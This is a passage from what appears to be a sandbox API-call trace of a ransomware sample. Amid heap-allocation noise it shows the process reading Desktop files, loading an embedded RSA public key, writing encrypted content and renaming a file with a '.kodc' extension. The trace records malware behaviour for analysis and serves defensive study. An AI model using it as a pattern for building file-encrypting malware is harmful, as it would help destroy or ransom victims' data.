Flags=0x0, Size=0x14) returned 0x32adee0 [0097.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a778 | out: hHeap=0x630000) returned 1 [0097.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a760 | out: hHeap=0x630000) returned 1 [0097.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.869] GetCurrentThreadId () returned 0x42c [0097.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x696458 [0097.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.870] GetCurrentThreadId () returned 0x42c [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a760 [0097.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0097.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a778 [0097.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a748 [0097.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a790 [0097.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0097.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0097.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.871] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a760 | out: hHeap=0x630000) returned 1 [0097.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a760 [0097.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.872] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15029, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.872] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.872] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.872] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.872] CloseHandle (hObject=0x5cc) returned 1 [0097.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0097.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0097.876] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q0Ki1.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q0ki1.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q0Ki1.odt.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q0ki1.odt.kodc")) returned 1 [0097.877] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedb01e90, ftCreationTime.dwHighDateTime=0x1d5bb39, ftLastAccessTime.dwLowDateTime=0xd478d9a0, ftLastAccessTime.dwHighDateTime=0x1d5bc90, ftLastWriteTime.dwLowDateTime=0xd478d9a0, ftLastWriteTime.dwHighDateTime=0x1d5bc90, nFileSizeHigh=0x0, nFileSizeLow=0x18f52, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="urNMQz.bmp", cAlternateFileName="")) returned 1 [0097.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0097.877] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urNMQz.bmp") returned=".bmp" [0097.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urNMQz.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\urnmqz.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.878] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=102226) returned 1 [0097.878] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.881] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18f2c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.881] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.882] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x18f52, lpOverlapped=0x0) returned 1 [0097.883] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.883] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.883] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.883] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0097.884] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.884] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.884] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.884] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.884] GetLastError () returned 0x0 [0097.884] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.884] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0097.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.884] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.884] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.884] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18f50) returned 0x9ba4d90 [0097.885] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0097.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340188 [0097.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a730 [0097.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x33401d0 [0097.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a748 [0097.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a778 [0097.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a790 [0097.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.886] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0097.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a778 | out: hHeap=0x630000) returned 1 [0097.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a790 | out: hHeap=0x630000) returned 1 [0097.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0097.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a790 [0097.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0097.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a778 [0097.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0097.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0097.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0097.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a790 | out: hHeap=0x630000) returned 1 [0097.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a778 | out: hHeap=0x630000) returned 1 [0097.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0097.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.887] GetCurrentThreadId () returned 0x42c [0097.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x6964e8 [0097.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0097.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.888] GetCurrentThreadId () returned 0x42c [0097.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a778 [0097.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0097.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a790 [0097.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a760 [0097.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a7a8 [0097.890] HeapFree (in: hHeap=0x630000, 